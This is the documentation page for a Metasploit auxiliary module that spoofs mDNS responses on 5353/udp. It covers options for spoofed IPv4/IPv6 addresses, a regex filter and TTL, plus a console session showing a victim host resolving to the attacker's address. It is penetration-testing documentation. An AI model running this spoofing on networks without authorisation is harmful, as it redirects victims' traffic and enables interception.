metasploit-framework/documentation/modules/auxiliary/spoof/mdns/mdns_response.md

This module will listen for mDNS multicast requests on 5353/udp for A and AAAA record queries, and respond with a spoofed IP address (assuming the request matches our regex).

Vulnerable Application

To use mdns_response, be on a network with devices/applications that can make mDNS multicast requests on 5353/udp for A and AAAA record queries.

Verification Steps

1. use auxiliary/spoof/mdns/mdns_response
2. set INTERFACE network_iface
3. set SPOOFIP4 10.x.x.x
4. run

Options

The SPOOFIP4 option

IPv4 address with which to spoof A-record queries

set SPOOFIP4 [IPv4 address]

The SPOOFIP6 option

IPv6 address with which to spoof AAAA-record queries

set SPOOFIP6 [IPv6 address]

The REGEX option

Regex applied to the mDNS to determine if spoofed reply is sent

set REGEX [regex]

The TTL option

Time To Live for the spoofed response (in seconds)

set TTL [number of seconds]

Scenarios

msf > use auxiliary/spoof/mdns/mdns_response
msf auxiliary(mdns_response) > set SPOOFIP4 10.x.x.y
SPOOFIP4 => 10.x.x.y
msf auxiliary(mdns_response) > set INTERFACE en3
INTERFACE => en3
msf auxiliary(mdns_response) > run
[*] Auxiliary module execution completed
msf auxiliary(mdns_response) >
[*] mDNS spoofer started. Listening for mDNS requests with REGEX "(?-mix:.*)" ...

On Victim Machine

ping something.local

(IP address should resolve to spoofed address)

[+] 10.x.x.z        mDNS - something.local. matches regex, responding with 10.x.x.y